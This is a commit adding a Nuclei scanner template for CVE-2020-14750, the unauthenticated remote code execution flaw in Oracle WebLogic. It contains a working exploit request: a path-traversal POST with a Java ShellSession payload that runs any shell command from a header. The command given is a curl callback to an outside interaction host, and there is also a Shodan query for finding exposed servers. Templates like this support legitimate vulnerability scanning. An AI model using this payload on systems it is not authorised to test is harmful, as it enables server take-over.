Merge pull request #1345 from projectdiscovery/princechaddha-patch-10

Create CVE-2020-14750.yaml

cves/2020/CVE-2020-14750.yaml

@@ -0,0 +1,64 @@
+id: CVE-2020-14750
+
+info:
+  name: Oracle WebLogic Server - Remote Code Execution
+  author: princechaddha,DhiyaneshDk
+  severity: critical
+  description: |
+    This Security Alert addresses CVE-2020-14750, a remote code execution vulnerability in Oracle WebLogic Server.
+    This vulnerability is related to CVE-2020-14882, which was addressed in the October 2020 Critical Patch Update.
+    It is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password.
+  reference:
+    - https://github.com/pprietosanchez/CVE-2020-14750
+    - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14750
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-14750
+  metadata:
+    verified: true
+    shodan-query: http.html:"Weblogic Application Server"
+  tags: cve,cve2020,rce,oracle,weblogic,unauth
+
+requests:
+  - raw:
+      - |
+        @timeout: 10s
+        POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: curl/7.79.1
+        Accept: */*
+        cmd: curl {{interactsh-url}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
+        weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
+        java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
+        field.setAccessible(true);
+        Object obj = field.get(adapter);
+        weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
+        String cmd = req.getHeader("cmd");
+        String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
+        if (cmd != null) {
+            String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
+            weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
+            res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
+            res.getServletOutputStream().flush();
+            res.getWriter().write("");
+        }executeThread.interrupt();
+        ");
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol   # Confirms DNS Interaction
+        words:
+          - "dns"
+
+      - type: word
+        part: header
+        words:
+          - "ADMINCONSOLESESSION="
+
+      - type: regex
+        part: body
+        regex:
+          - '<html><head></head><body>(.*)</body></html>'